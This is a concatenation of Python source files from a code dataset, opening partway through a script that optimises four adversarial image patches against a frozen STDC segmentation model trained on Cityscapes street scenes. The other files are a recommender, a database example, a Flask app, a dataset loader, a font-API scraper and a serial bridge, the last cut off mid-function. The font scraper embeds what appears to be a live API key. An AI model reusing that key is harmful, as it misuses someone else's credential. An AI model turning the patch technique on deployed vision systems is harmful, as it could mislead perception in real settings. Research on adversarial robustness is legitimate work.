else:\n        raise argparse.ArgumentTypeError('Unsupported value encountered.')\n\n\n# --pretrain_path\ndef parse_args():\n    parse = argparse.ArgumentParser()\n    parse.add_argument(\n        '--local_rank',\n        dest='local_rank',\n        type=int,\n        default=-1,\n    )\n    parse.add_argument(\n        '--n_workers_train',\n        dest='n_workers_train',\n        type=int,\n        default=12,\n    )\n    parse.add_argument(\n        '--n_workers_val',\n        dest='n_workers_val',\n        type=int,\n        default=1,\n    )\n    # batch size\n    parse.add_argument(\n        '--n_img_per_gpu',\n        dest='n_img_per_gpu',\n        type=int,\n        default=8,\n    )\n    # maximum number of iterations\n    parse.add_argument(\n        '--max_iter',\n        dest='max_iter',\n        type=int,\n        default=150000,\n    )\n    # checkpoint/evaluation frequency\n    parse.add_argument(\n        '--save_iter_sep',\n        dest='save_iter_sep',\n        type=int,\n        default=1000,\n    )\n    parse.add_argument(\n        '--warmup_steps',\n        dest='warmup_steps',\n        type=int,\n        default=500,\n    )\n    # run mode\n    parse.add_argument(\n        '--mode',\n        dest='mode',\n        type=str,\n        default='train',\n    )\n    parse.add_argument(\n        '--ckpt',\n        dest='ckpt',\n        type=str,\n        default=\"./checkpoints/STDC2-Seg/model_maxmIOU75.pth\",\n    )\n    # model save path\n    parse.add_argument(\n        '--respath',\n        dest='respath',\n        type=str,\n        default=\"checkpoints/with_update_STDC2-Seg/\",\n    )\n    # backbone network\n    parse.add_argument(\n        '--backbone',\n        dest='backbone',\n        type=str,\n        default='STDCNet1446',\n    )\n    # pretrained model\n    parse.add_argument(\n        '--pretrain_path',\n        dest='pretrain_path',\n        type=str,\n        default=None,\n    )\n    parse.add_argument(\n        '--use_conv_last',\n        dest='use_conv_last',\n        type=str2bool,\n        default=False,\n    )\n    parse.add_argument(\n        '--use_boundary_2',\n        dest='use_boundary_2',\n        type=str2bool,\n        default=False,\n    )\n    parse.add_argument(\n        '--use_boundary_4',\n        dest='use_boundary_4',\n        type=str2bool,\n        default=False,\n    )\n    parse.add_argument(\n        '--use_boundary_8',\n        dest='use_boundary_8',\n        type=str2bool,\n        default=True,\n    )\n    parse.add_argument(\n        '--use_boundary_16',\n        dest='use_boundary_16',\n        type=str2bool,\n        default=False,\n    )\n    return parse.parse_args()\n\n\nclass GenerateImage(nn.Module):\n    def __init__(self):\n        super(GenerateImage, self).__init__()\n        # self.conv = nn.Conv2d(3, 3, 1, 1)\n        # self.STDC = nn.Sequential(model)\n\n    def forward(self, img, patch, mask):\n        ih, iw = img.shape[2:]\n        ib = img.shape[0]\n        # print(img.device)\n        img_batch = img.clone()\n        # print(img_batch.device)\n        # print(patch[0].shape)\n        # exit(0)\n        # padding order: left, right, top, bottom\n        pad_way = [[0, iw - patch_size, 0, ih - patch_size],\n                   [iw - patch_size, 0, 0, ih - patch_size],\n                   [0, iw - patch_size, ih - patch_size, 0],\n                   [iw - patch_size, 0, ih - patch_size, 0]]\n        mask = mask.unsqueeze(dim=0).repeat([ib, 1, 1, 1])\n        # make mask\n        for index, way in enumerate(pad_way):\n            mask_temp = F.pad(mask, (way[0], way[1], way[2], way[3]))\n            patch_temp = patch[index].unsqueeze(dim=0).repeat([ib, 1, 1, 1])\n            patch_temp = F.pad(patch_temp, (way[0], way[1], way[2], way[3]))\n            mask_temp = mask_temp.type(torch.float32)\n            img_batch = torch.where(mask_temp > 0.00001, patch_temp, img_batch)\n        return img_batch\n\n\ndef generate_patch(load_from_file=None, is_random=False, is_cmyk=0):\n    xpatch_size, ypatch_size = patch_size, patch_size\n    # load an image from a local path\n    if load_from_file is not None:\n        patch = Image.open(load_from_file)\n        patch = patch.resize((xpatch_size, ypatch_size))\n        patch = transforms.PILToTensor()(patch) / 255.\n        return patch\n    if is_random:\n        if is_cmyk:\n            return torch.rand((4, xpatch_size, ypatch_size))\n        else:\n            return torch.rand((3, xpatch_size, ypatch_size))\n    if is_cmyk:\n        return torch.full((4, xpatch_size, ypatch_size), 
0.5)\n    else:\n        return torch.full((3, xpatch_size, ypatch_size), 0.5)\n\n\ndef train():\n    args = parse_args()\n    # set the model save path\n    save_pth_path = os.path.join(args.respath, 'pths')\n    dspth = './data'\n\n    print(save_pth_path)\n    print(osp.exists(save_pth_path))\n    # if not osp.exists(save_pth_path) and dist.get_rank()==0:\n    if not osp.exists(save_pth_path):\n        os.makedirs(save_pth_path)\n\n    # torch.cuda.set_device(args.local_rank)\n    # dist.init_process_group(\n    #     backend = 'nccl',\n    #     init_method = 'tcp://127.0.0.1:8081',\n    #     world_size = torch.cuda.device_count(),\n    #     rank=args.local_rank\n    # )\n    # print(\"你行不行\")\n    # set up the log file\n    setup_logger(args.respath)\n    ## dataset\n    n_classes = 19\n    n_img_per_gpu = args.n_img_per_gpu\n    n_workers_train = args.n_workers_train\n    n_workers_val = args.n_workers_val\n    use_boundary_16 = args.use_boundary_16\n    use_boundary_8 = args.use_boundary_8\n    use_boundary_4 = args.use_boundary_4\n    use_boundary_2 = args.use_boundary_2\n\n    mode = args.mode\n    # output size\n    cropsize = [1024, 512]\n    # random scale factors\n    randomscale = (0.125, 0.25, 0.375, 0.5, 0.625, 0.75, 0.875, 1.0, 1.125, 1.25, 1.375, 1.5)\n\n    # if dist.get_rank()==0:\n    #     logger.info('n_workers_train: {}'.format(n_workers_train))\n    #     logger.info('n_workers_val: {}'.format(n_workers_val))\n    #     logger.info('use_boundary_2: {}'.format(use_boundary_2))\n    #     logger.info('use_boundary_4: {}'.format(use_boundary_4))\n    #     logger.info('use_boundary_8: {}'.format(use_boundary_8))\n    #     logger.info('use_boundary_16: {}'.format(use_boundary_16))\n    #     logger.info('mode: {}'.format(args.mode))\n    # load the dataset\n    ds = CityScapes(dspth, cropsize=cropsize, mode=mode, randomscale=randomscale)\n    # sampler = torch.utils.data.distributed.DistributedSampler(ds)\n    dl = DataLoader(ds,\n                    batch_size=n_img_per_gpu,\n                    shuffle=False,\n                    num_workers=n_workers_train,\n\n                    pin_memory=False,\n                    drop_last=True)\n    # exit(0)\n    dsval = CityScapes(dspth, mode='val', randomscale=randomscale)\n    # sampler_val = torch.utils.data.distributed.DistributedSampler(dsval)\n    dlval = DataLoader(dsval,\n                       batch_size=2,\n                       shuffle=False,\n                       num_workers=n_workers_val,\n                       drop_last=False)\n\n    ## model\n    ignore_idx = 255\n    # net = BiSeNet(backbone=args.backbone, n_classes=n_classes, pretrain_model=args.pretrain_path,\n    #               use_boundary_2=use_boundary_2, use_boundary_4=use_boundary_4, use_boundary_8=use_boundary_8,\n    #               use_boundary_16=use_boundary_16, use_conv_last=args.use_conv_last)\n    net = torch.load(\"./checkpoints/edge_optim_STDC2-Seg/pths/model_maxmIOU75.pth\")\n    net.cuda(CUDA_ID)\n    # net.train()\n    # net = nn.parallel.DistributedDataParallel(net,\n    #                                           device_ids=[args.local_rank, ],\n    #                                           output_device=args.local_rank,\n    #                                           find_unused_parameters=True\n    #                                           )\n\n    score_thres = 0.7\n    # not entirely clear what this computes: batch*h*w//16\n    n_min = n_img_per_gpu * cropsize[0] * cropsize[1] // 16\n    criteria_p = OhemCELoss(thresh=score_thres, n_min=n_min, ignore_lb=ignore_idx)\n    criteria_16 = OhemCELoss(thresh=score_thres, n_min=n_min, ignore_lb=ignore_idx)\n    criteria_32 = OhemCELoss(thresh=score_thres, n_min=n_min, ignore_lb=ignore_idx)\n    # detail loss\n    boundary_loss_func = DetailAggregateLoss()\n    ## optimizer\n    maxmIOU50 = 0.\n    maxmIOU75 = 0.\n    momentum = 0.9\n    weight_decay = 5e-4\n    lr_start = 1e-2\n    max_iter = args.max_iter\n    save_iter_sep = args.save_iter_sep\n    power = 0.9\n    warmup_steps = args.warmup_steps\n    warmup_start_lr = 1e-5\n    eval_times = 0\n\n    # if dist.get_rank()==0:\n    #     print('max_iter: ', max_iter)\n    #     print('save_iter_sep: ', save_iter_sep)\n    #     print('warmup_steps: ', warmup_steps)\n    # optim = Optimizer(\n    #     model=net,\n    # 
loss=boundary_loss_func,\n    #     lr0=lr_start,\n    #     momentum=momentum,\n    #     wd=weight_decay,\n    #     warmup_steps=warmup_steps,\n    #     warmup_start_lr=warmup_start_lr,\n    #     max_iter=max_iter,\n    #     power=power)\n    # generate the patch images and freeze all of the network's parameters\n    for params in net.parameters():\n        params.requires_grad = False\n\n    patches = []\n    for i in range(4):\n        adv_patch_cpu = generate_patch(is_random=True, is_cmyk=0)\n        adv_patch = adv_patch_cpu.cuda(CUDA_ID)\n        adv_patch.requires_grad_(True)\n        patches.append(adv_patch)\n    # adv_patch_cpu = generate_patch(is_random=True, is_cmyk=0)\n    # # adv_patch_cpu.requires_grad_(True)\n    # adv_patch = adv_patch_cpu.cuda(CUDA_ID)\n    # adv_patch.requires_grad_(True)\n    # adv_patch_cpu.requires_grad = True\n    mask_patch = torch.ones_like(patches[0])\n    trick = GenerateImage().cuda(CUDA_ID)\n\n    # trick.train()\n    optim = torch.optim.Adam(patches, lr=0.0001, betas=(0.9, 0.999),\n                             eps=1e-08,\n                             weight_decay=0)\n    ## train loop\n    msg_iter = 50\n    loss_avg = []\n    loss_boundery_bce = []\n    loss_boundery_dice = []\n    st = glob_st = time.time()\n    diter = iter(dl)\n    epoch = 0\n    for it in range(max_iter):\n        try:\n            # iterate over the dataset\n            im, lb = next(diter)\n            if not im.size()[0] == n_img_per_gpu: raise StopIteration\n        except StopIteration:\n            epoch += 1\n            # sampler.set_epoch(epoch)\n            diter = iter(dl)\n            im, lb = next(diter)\n\n        # print(im.shape)\n        # exit(0)\n        # move data to CUDA\n\n        mask_patch = mask_patch.cuda(CUDA_ID)\n        im = im.cuda(CUDA_ID)\n\n        # im = trick(im, adv_patch_cpu, mask_patch)\n        lb = lb.cuda(CUDA_ID)\n        H, W = im.size()[2:]\n        lb = torch.squeeze(lb, 1)\n        # test_data = net(im)\n        # print(test_data)\n        # print(type(test_data))\n        # print(len(test_data))\n        # exit(0)\n        # out, out16, out32, detail8 = net(im, adv_patch_cpu, mask_patch)\n        if use_boundary_2 and use_boundary_4 and use_boundary_8:\n            out, out16, out32, detail2, detail4, detail8 = net(trick(im, patches, mask_patch))\n\n        if (not use_boundary_2) and use_boundary_4 and use_boundary_8:\n            out, out16, out32, detail4, detail8 = net(trick(im, patches, mask_patch))\n\n        if (not use_boundary_2) and (not use_boundary_4) and use_boundary_8:\n            out, out16, out32, detail8 = net(trick(im, patches, mask_patch))\n\n        if (not use_boundary_2) and (not use_boundary_4) and (not use_boundary_8):\n            out, out16, out32 = net(trick(im, patches, mask_patch))\n        # this is just a slightly modified cross-entropy loss\n        lossp = criteria_p(out, lb)\n        loss2 = criteria_16(out16, lb)\n        loss3 = criteria_32(out32, lb)\n        optim.zero_grad()\n        # print(adv_patch_cpu.grad)\n        # exit(0)\n        boundery_bce_loss = 0.\n        boundery_dice_loss = 0.\n\n        if use_boundary_2:\n            # if dist.get_rank()==0:\n            #     print('use_boundary_2')\n            boundery_bce_loss2, boundery_dice_loss2 = boundary_loss_func(detail2, lb)\n            boundery_bce_loss += boundery_bce_loss2\n            boundery_dice_loss += boundery_dice_loss2\n\n        if use_boundary_4:\n            # if dist.get_rank()==0:\n            #     print('use_boundary_4')\n            boundery_bce_loss4, boundery_dice_loss4 = boundary_loss_func(detail4, lb)\n            boundery_bce_loss += boundery_bce_loss4\n            boundery_dice_loss += boundery_dice_loss4\n\n        if use_boundary_8:\n            # if dist.get_rank()==0:\n            #     print('use_boundary_8')\n            # compute the boundary loss here\n            boundery_bce_loss8, boundery_dice_loss8 = boundary_loss_func(detail8, lb)\n            boundery_bce_loss += boundery_bce_loss8\n            boundery_dice_loss += boundery_dice_loss8\n\n        loss = lossp + loss2 + loss3 + boundery_bce_loss + boundery_dice_loss\n\n        loss.backward()\n        optim.step()\n\n        patches[0].data.clamp_(0, 1)\n        patches[1].data.clamp_(0, 1)\n        patches[2].data.clamp_(0, 1)\n        patches[3].data.clamp_(0, 1)\n\n        loss_avg.append(loss.item())\n\n        
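# Note: only the four patch tensors require gradients (the network weights were\n        # frozen above), so optim.step() updates the adversarial patches alone and the\n        # clamp keeps them inside the valid [0, 1] image range.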
loss_boundery_bce.append(boundery_bce_loss.item())\n loss_boundery_dice.append(boundery_dice_loss.item())\n # torch.cuda.empty_cache()\n\n ## print training log message\n if (it + 1) % msg_iter == 0:\n loss_avg = sum(loss_avg) / len(loss_avg)\n # lr = optim.lr\n lr = optim.defaults[\"lr\"]\n ed = time.time()\n t_intv, glob_t_intv = ed - st, ed - glob_st\n eta = int((max_iter - it) * (glob_t_intv / it))\n eta = str(datetime.timedelta(seconds=eta))\n\n loss_boundery_bce_avg = sum(loss_boundery_bce) / len(loss_boundery_bce)\n loss_boundery_dice_avg = sum(loss_boundery_dice) / len(loss_boundery_dice)\n msg = ', '.join([\n 'it: {it}/{max_it}',\n 'lr: {lr:4f}',\n 'loss: {loss:.4f}',\n 'boundery_bce_loss: {boundery_bce_loss:.4f}',\n 'boundery_dice_loss: {boundery_dice_loss:.4f}',\n 'eta: {eta}',\n 'time: {time:.4f}',\n ]).format(\n it=it + 1,\n max_it=max_iter,\n lr=lr,\n loss=loss_avg,\n boundery_bce_loss=loss_boundery_bce_avg,\n boundery_dice_loss=loss_boundery_dice_avg,\n time=t_intv,\n eta=eta\n )\n\n logger.info(msg)\n loss_avg = []\n loss_boundery_bce = []\n loss_boundery_dice = []\n st = ed\n\n # print(boundary_loss_func.get_params())\n if (it + 1) % save_iter_sep == 0: # and it != 0:\n\n ## model\n logger.info('evaluating the model ...')\n logger.info('setup and restore model')\n\n net.eval()\n # trick.eval()\n\n # ## evaluator\n eval_times += 1\n logger.info('compute the mIOU')\n with torch.no_grad():\n single_scale1 = MscEvalV0()\n mIOU50 = single_scale1(net, dlval, n_classes, trick, patches, mask_patch)\n\n single_scale2 = MscEvalV0(scale=0.75)\n mIOU75 = single_scale2(net, dlval, n_classes, trick, patches, mask_patch)\n\n # save_pth = osp.join(save_pth_path, 'model_iter{}_mIOU50_{}_mIOU75_{}.pth'\n # .format(it + 1, str(round(mIOU50, 4)), str(round(mIOU75, 4))))\n # # torch.save(net, save_pth)\n # state = net.module.state_dict() if hasattr(net, 'module') else net.state_dict()\n # # if dist.get_rank()==0:\n # torch.save(state, save_pth)\n\n # logger.info('training iteration {}, model saved to: {}'.format(it + 1, save_pth))\n logger.info('mIOU50 is: {}, mIOU75 is: {}'.format(mIOU50, mIOU75))\n\n save_patch_path = \"./images/patch/\"\n index = ['00', '01', '10', '11']\n for i, p in zip(index, patches):\n patch_name = os.path.join(save_patch_path + i + '/', f\"{mIOU75}_{mIOU50}.jpg\")\n torchvision.utils.save_image(p, patch_name)\n # summary.add_scalar(\"mIOU75\", mIOU75, eval_times)\n # summary.add_scalar(\"mIOU50\", mIOU50, eval_times)\n\n # exit(1)\n if mIOU50 > maxmIOU50:\n maxmIOU50 = mIOU50\n save_pth = osp.join(save_pth_path, 'model_maxmIOU50.pth'.format(it + 1))\n # state = net.module.state_dict() if hasattr(net, 'module') else net.state_dict()\n # # if dist.get_rank()==0:\n # torch.save(state, save_pth)\n # torch.save(net, save_pth)\n logger.info('max mIOU model saved to: {}'.format(save_pth))\n\n if mIOU75 > maxmIOU75:\n maxmIOU75 = mIOU75\n save_pth = osp.join(save_pth_path, 'model_maxmIOU75.pth'.format(it + 1))\n # state = net.module.state_dict() if hasattr(net, 'module') else net.state_dict()\n # if dist.get_rank()==0:\n # torch.save(state, save_pth)\n # torch.save(net, save_pth)\n logger.info('max mIOU model saved to: {}'.format(save_pth))\n logger.info('maxmIOU50 is: {}, maxmIOU75 is: {}.'.format(maxmIOU50, maxmIOU75))\n\n # net.train()\n net.eval()\n ## dump the final model\n save_pth = osp.join(save_pth_path, 'model_final.pth')\n net.cpu()\n # state = net.module.state_dict() if hasattr(net, 'module') else net.state_dict()\n # if dist.get_rank()==0:\n # torch.save(state, 
save_pth)\n # torch.save(net, save_pth)\n logger.info('training done, model saved to: {}'.format(save_pth))\n print('epoch: ', epoch)\n\n\nif __name__ == \"__main__\":\n train()\n","repo_name":"zeroRains/STDC-MA","sub_path":"train_second.py","file_name":"train_second.py","file_ext":"py","file_size_in_byte":18637,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"}
{"seq_id":"33437879504","text":"import math\nimport numpy as np\nfrom scipy.spatial import distance\n\nclass UserBasedCF(object):\n def __init__(self, train_file):\n self.train_file = train_file\n self.readData()\n self.UserSimilarity_cosin()\n\n def readData(self):\n self.user_item = dict()\n with open(self.train_file, \"r\", encoding=\"utf-8\") as f:\n for line in f:\n user, item, score, _ = line.strip().split(\"\\t\")\n self.user_item.setdefault(user, {})\n self.user_item[user][item] = int(score)\n\n\n def UserSimilarity_cosin(self):\n self.item_user = dict()\n for user, items in self.user_item.items():\n for i in items.keys():\n if i not in self.item_user:\n self.item_user[i] = set()\n self.item_user[i].add(user)\n\n C = dict() # user-user co-occurrence matrix\n for user in self.item_user.values():\n for u in user:\n C.setdefault(u, {})\n for v in user:\n if u == v:\n continue\n C[u].setdefault(v, 0)\n C[u][v] += 1\n # print(C[\"1\"][\"2\"])\n # print(\"------------------------------------\")\n\n self.W = dict()\n for u, related_users in C.items():\n self.W.setdefault(u, {})\n for v, cuv in related_users.items():\n self.W[u][v] = cuv / math.sqrt(len(self.user_item[u]) * len(self.user_item[v]))\n\n return self.W\n\n def Recommend(self, user, K=2, N=5):\n rank = dict()\n action_item = self.user_item[user].keys()\n\n for v, wuv in sorted(self.W[user].items(), key=lambda x: x[1], reverse=True)[0:K]:\n for i, rvi in self.user_item[v].items():\n if i in action_item:\n continue\n rank.setdefault(i, 0)\n rank[i] += wuv * rvi\n return list(sorted(rank.items(), key=lambda x: x[1], reverse=True)[0:N])\n\n\nif __name__ == \"__main__\":\n ucf = UserBasedCF(\"./ml-100k/u1.base\")\n print(ucf.Recommend(\"2\"))","repo_name":"tantao258/recommend","sub_path":"algorithm/UCF.py","file_name":"UCF.py","file_ext":"py","file_size_in_byte":2107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"41838913595","text":"import requests\nimport json\nimport mysql.connector\n\n#api authentication\n#The code first defines two variables: API_KEY and API_ENDPOINT. \n#These variables store the API key and the endpoint URL for the API you want to access.\nAPI_KEY = 'your_api_key_here'\nAPI_ENDPOINT = 'https://api.example.com/data'\n\n# The next line creates a dictionary called headers. \n# This dictionary contains a single key-value pair: Authorization and Bearer {API_KEY}. \n# This header tells the API that you are authorized to access it.\nheaders = {\n 'Authorization': f'Bearer {API_KEY}'\n}\n\n#The next line uses the requests library to make a GET request to the API endpoint. \n#The headers dictionary is passed as an argument to the requests.get() function.\n#The requests.get() function returns a response object. \n#This object contains information about the response, such as the status code and the response body.\ntry:\n    response = requests.get(API_ENDPOINT, headers=headers)\n#The next line checks the response.status_code. If the status code is 200, then the request was successful. \n# In this case, the response.json() method is used to decode the response body as JSON. 
\n# The decoded JSON data is then printed to the console.\n if response.status_code == 200:\n data = response.json()\n print(\"API response:\", data)\n#If the status code is not 200, then the request failed. \n#In this case, the print() function is used to print the status code to the console. \n else:\n print(\"API request failed. Status code:\", response.status_code)\n# The final two lines of code handle errors that might occur when making the API request. \n# The except clause catches any requests.exceptions.RequestException errors. \n# These errors are raised when there is a problem making the request, such as a network error or a malformed request. \n# If an error occurs, the print() function is used to print the error message to the console.\nexcept requests.exceptions.RequestException as e:\n print(\"Error making API request:\", e)\n\n# Replace these values with your MySQL database credentials\ndb_config = {\n 'host': 'your_host',\n 'user': 'your_username',\n 'password': 'your_password',\n 'database': 'your_database_name'\n}\n\n\ndef create_connection():\n try:\n conn = mysql.connector.connect(**db_config)\n return conn\n except mysql.connector.Error as err:\n print(f\"Error connecting to MySQL: {err}\")\n return None\n\n\ndef read_json_data_from_file(file_path):\n try:\n with open(file_path, 'r') as file:\n data = json.load(file)\n return data\n except FileNotFoundError:\n print(f\"File '{file_path}' not found.\")\n return None\n except json.JSONDecodeError as err:\n print(f\"Error decoding JSON in file '{file_path}': {err}\")\n return None\n\n\ndef check_and_insert_data(data):\n try:\n connection = create_connection()\n if not connection:\n return\n\n cursor = connection.cursor()\n\n name = data['name']\n employee_id = data['id']\n lob = data['lob']\n service = data['service']\n # Check if any of the 4 values already exist in the database\n cursor.execute(\"SELECT id FROM employees WHERE name = %s OR id = %s OR lob = %s OR service = %s\",\n (name, employee_id, lob, service))\n result = cursor.fetchone()\n if result:\n print(\"CUSTOMER ALREADY EXISTS\")\n\n if not result:\n # If none of the values are present, insert the record into the database\n cursor.execute(\"INSERT INTO employees (name, id, lob, service) VALUES (%s, %s, %s, %s)\",\n (name, employee_id, lob, service))\n print(f\"Inserted data for {name}\")\n\n # Commit changes to the database\n connection.commit()\n\n except mysql.connector.Error as err:\n print(f\"Error accessing MySQL: {err}\")\n finally:\n if connection:\n connection.close()\n print(\"Database connection closed.\")\n\nif __name__ == \"__main__\":\n json_file_path = \"data.json\" # Replace this with the path to your JSON file\n json_data = read_json_data_from_file(json_file_path)\n if json_data:\n # Now you can use the 'json_data' variable containing the JSON data read from the file\n check_and_insert_data(json_data)","repo_name":"kathirnatchiyar/Fast_API","sub_path":"comments/comments_added_bala.py","file_name":"comments_added_bala.py","file_ext":"py","file_size_in_byte":4551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
User\n\n@app.route('/read')\ndef read():\n return render_template('read.html')\n\n@app.route('/') #read.html\ndef index():\n names = User.get_all()\n return render_template('read.html', names=names)\n\n@app.route('/add_new') #create.html\ndef add ():\n return render_template('/create.html')\n \n@app.route('/process', methods=['POST']) #read_one.html\ndef process():\n data = {\n \"fname\": request.form[\"fname\"],\n \"lname\": request.form[\"lname\"],\n \"email\": request.form[\"email\"]\n } \n id = User.save(data)\n return redirect(f'/show/{id}')\n\n@app.route('/show/<int:id>') #read_one\ndef show(id):\n data = {\n \"id\": id\n }\n print(id)\n return render_template('read_one.html', user=User.show(data))\n\n@app.route('/create_user', methods=['POST'])\ndef create():\n return redirect('/')\n\n@app.route('/delete/<int:id>')\ndef delete(id):\n data = {\n \"id\": id\n }\n User.delete(data)\n return redirect('/')\n \n@app.route('/edit') #edit.html\ndef edit():\n return render_template('edit.html')\n\n\n\n","repo_name":"Brian-304/Users_CRUD_Modularization_Python","sub_path":"flask_app/controllers/characters.py","file_name":"characters.py","file_ext":"py","file_size_in_byte":1196,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"23580915286","text":"import anytree\nimport numpy as np\nimport os\nimport torch\nfrom PIL import Image\nfrom torch.utils.data import Dataset\nfrom utils import check_exists, makedir_exist_ok, save, load\nfrom .utils import download_url, extract_file, make_classes_counts, make_tree, make_flat_index\n\n\nclass STL10(Dataset):\n data_name = 'STL10'\n file = [('http://ai.stanford.edu/~acoates/stl10/stl10_binary.tar.gz', '91f7769df0f17e558f3565bffb0c7dfb')]\n\n def __init__(self, root, split, transform=None):\n self.root = os.path.expanduser(root)\n self.split = split\n self.transform = transform\n if not check_exists(self.processed_folder):\n self.process()\n id, self.data, self.target = load(os.path.join(self.processed_folder, '{}.pt'.format(self.split)),\n mode='pickle')\n self.classes_counts = make_classes_counts(self.target)\n self.classes_to_labels, self.target_size = load(os.path.join(self.processed_folder, 'meta.pt'), mode='pickle')\n self.other = {'id': id}\n\n def __getitem__(self, index):\n data, target = Image.fromarray(self.data[index]), torch.tensor(self.target[index])\n other = {k: torch.tensor(self.other[k][index]) for k in self.other}\n input = {**other, 'data': data, 'target': target}\n if self.transform is not None:\n input = self.transform(input)\n return input\n\n def __len__(self):\n return len(self.data)\n\n @property\n def processed_folder(self):\n return os.path.join(self.root, 'processed')\n\n @property\n def raw_folder(self):\n return os.path.join(self.root, 'raw')\n\n def process(self):\n if not check_exists(self.raw_folder):\n self.download()\n train_set, test_set, meta = self.make_data()\n save(train_set, os.path.join(self.processed_folder, 'train.pt'), mode='pickle')\n save(test_set, os.path.join(self.processed_folder, 'test.pt'), mode='pickle')\n save(meta, os.path.join(self.processed_folder, 'meta.pt'), mode='pickle')\n return\n\n def download(self):\n makedir_exist_ok(self.raw_folder)\n for (url, md5) in self.file:\n filename = os.path.basename(url)\n download_url(url, self.raw_folder, filename, md5)\n extract_file(os.path.join(self.raw_folder, filename))\n return\n\n def __repr__(self):\n fmt_str = 'Dataset {}\\nSize: {}\\nRoot: {}\\nSplit: {}\\nTransforms: {}'.format(\n 
self.__class__.__name__, self.__len__(), self.root, self.split, self.transform.__repr__())\n return fmt_str\n\n def make_data(self):\n train_labeled_data, train_labeled_target = read_data_file(\n os.path.join(self.raw_folder, 'stl10_binary', 'train_X.bin'),\n os.path.join(self.raw_folder, 'stl10_binary', 'train_y.bin'))\n train_unlabeled_data, train_unlabeled_target = read_data_file(\n os.path.join(self.raw_folder, 'stl10_binary', 'unlabeled_X.bin'))\n train_data = np.concatenate((train_labeled_data, train_unlabeled_data))\n train_target = np.concatenate((train_labeled_target, train_unlabeled_target))\n test_data, test_target = read_data_file(\n os.path.join(self.raw_folder, 'stl10_binary', 'test_X.bin'),\n os.path.join(self.raw_folder, 'stl10_binary', 'test_y.bin'))\n train_id, test_id = np.arange(len(train_data)).astype(np.int64), np.arange(len(test_data)).astype(np.int64)\n classes_to_labels = anytree.Node('U', index=[])\n classes = list(map(str, list(range(10))))\n for c in classes:\n make_tree(classes_to_labels, [c])\n classes_size = make_flat_index(classes_to_labels)\n return (train_id, train_data, train_target), (test_id, test_data, test_target), (\n classes_to_labels, classes_size)\n\n\ndef read_data_file(data_path, label_path=None):\n with open(data_path, 'rb') as f:\n # read whole file in uint8 chunks\n everything = np.fromfile(f, dtype=np.uint8)\n images = np.reshape(everything, (-1, 3, 96, 96))\n images = np.transpose(images, (0, 3, 2, 1))\n if label_path is not None:\n with open(label_path, 'rb') as f:\n labels = (np.fromfile(f, dtype=np.uint8) - 1).astype(np.int64) # 0-based\n else:\n labels = - np.ones(images.shape[0], dtype=np.int64)\n return images, labels\n","repo_name":"diaoenmao/SemiFL-Semi-Supervised-Federated-Learning-for-Unlabeled-Clients-with-Alternate-Training","sub_path":"src/datasets/stl.py","file_name":"stl.py","file_ext":"py","file_size_in_byte":4385,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"52"}
{"seq_id":"8211925775","text":"import argparse\nfrom unicodedata import category\nimport requests\nimport cv2\nimport numpy as np\nimport os\nimport csv\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-c\", type=str, required=True, help=\"(Required) Add a string with category, use flag: -c\")\nparser.add_argument(\"-o\", type=str, required=True, help=\"(Required) Add a string with the path to a csv file, use flag: -o\")\nargs = parser.parse_args()\nCATEGORY = args.c\nOUTPUTFILE = args.o\n\ndef writeToCSV(category, typeface, styleName, styleId):\n f = open(OUTPUTFILE, 'a', encoding='UTF8')\n writer = csv.writer(f, delimiter=';')\n row = [category, typeface, styleName, styleId]\n writer.writerow(row)\n f.close()\n\ndef fetchStyles():\n try:\n apiResponse = requests.get(f'https://api.myfonts.net/v1/family?api_key=EE5HsjFDom5yIcGTdBu2KhMBO&&category={CATEGORY}&extra_data=styles')\n if apiResponse.json()[\"total_results\"] == 0:\n print(f'There was an error while fetching {CATEGORY}. 
Check your -c string')\n else:\n familyResponseJson = apiResponse.json()[\"results\"] \n familyKeys = list(familyResponseJson.keys()) \n for s in range(len(familyKeys)):\n if \"styles\" in familyResponseJson[familyKeys[s]]:\n styleResponseJson =familyResponseJson[familyKeys[s]]['styles'] \n for j in range(len(styleResponseJson)):\n styleName = styleResponseJson[j][\"name\"]\n styleId = styleResponseJson[j][\"id\"]\n familyName = familyResponseJson[familyKeys[s]][\"name\"].replace(\"™\", u\"\\u2122\").replace(\"®\",u\"\\xae\")\n writeToCSV(CATEGORY.replace(\"-\",\" \"), familyName,styleName, styleId)\n except requests.exceptions.HTTPError as err:\n raise SystemExit(err) \nfetchStyles()\n","repo_name":"johanHardon/quantitative-typography-analysis","sub_path":"font-database-large-corpus/categoryApi.py","file_name":"categoryApi.py","file_ext":"py","file_size_in_byte":1907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28245617213","text":"from __future__ import annotations\n\nfrom contextlib import asynccontextmanager, closing\nfrom typing import AsyncIterator, TYPE_CHECKING\n\nfrom trio import open_memory_channel, open_nursery, to_thread\nfrom trio.abc import SendChannel\nfrom trio.socket import (\n socket,\n AF_INET,\n IPPROTO_UDP,\n SOCK_DGRAM,\n)\n\nif TYPE_CHECKING:\n from serial import Serial\n\n__all__ = (\"UDPSerialBridge\",)\n\n\nclass UDPSerialBridge:\n \"\"\"Background task that creates a transparent bridge between a UDP port\n and a serial port.\n\n Packets received on the UDP port are serialized and forwarded to the serial\n port. Packets written to the serial port are forwarded to all UDP\n hostname-port pairs that have ever sent a packet to the UDP port.\n \"\"\"\n\n _address: str\n _port: Serial\n _targets: set[tuple[str, int]]\n\n def __init__(self, address: str, port: Serial):\n \"\"\"Constructor.\n\n Args:\n address: IP address and port to listen to\n port: serial port to forward the packets to\n \"\"\"\n self._address = address\n self._port = port\n self._targets = set()\n\n @asynccontextmanager\n async def use(self) -> AsyncIterator[None]:\n host, _, port = self._address.partition(\":\")\n\n listener = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)\n await listener.bind((host, port))\n\n async with open_nursery() as nursery:\n socket_tx = await nursery.start(self._write_to_socket, listener)\n port_tx = await nursery.start(self._write_to_serial_port)\n\n await nursery.start(self._read_from_socket, listener, port_tx)\n await nursery.start(self._read_from_serial_port, socket_tx)\n\n yield\n\n async def _read_from_serial_port(\n self, tx: SendChannel[bytes], *, 